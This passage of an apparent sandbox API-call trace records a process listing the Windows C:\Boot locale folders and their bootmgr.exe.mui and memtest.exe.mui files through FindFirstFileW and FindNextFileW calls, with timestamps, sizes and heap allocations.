hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211c6af1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.036] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.037] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.037] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0285.037] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.037] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0285.037] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.037] FindFirstFileW (in: lpFileName="C:\\Boot\\lt-LT\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947f68 [0285.037] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.037] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.038] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.038] FindClose (in: hFindFile=0x3947f68 | out: hFindFile=0x3947f68) returned 1 [0285.038] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.038] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0285.038] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.038] FindFirstFileW (in: lpFileName="C:\\Boot\\lv-LV\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0285.040] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.040] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.040] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.040] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0285.040] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.040] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0285.041] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0285.041] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.041] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947f68 [0285.042] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.042] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.042] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.042] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.042] FindClose (in: hFindFile=0x3947f68 | out: hFindFile=0x3947f68) returned 1 [0285.042] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.042] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0285.042] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.043] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947de8 [0285.043] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.043] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.043] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.043] FindNextFileW (in: hFindFile=0x3947de8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.043] FindClose (in: hFindFile=0x3947de8 | out: hFindFile=0x3947de8) returned 1 [0285.043] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.043] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0285.044] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.044] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947f68 [0285.044] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.045] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.045] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.045] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.045] FindClose (in: hFindFile=0x3947f68 | out: hFindFile=0x3947f68) returned 1 [0285.045] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.045] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0285.045] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.045] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39480a8 [0285.046] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.046] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.046] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.047] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.047] FindClose (in: hFindFile=0x39480a8 | out: hFindFile=0x39480a8) returned 1 [0285.047] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.047] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0285.047] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.047] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39481a8 [0285.048] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.048] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.048] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, 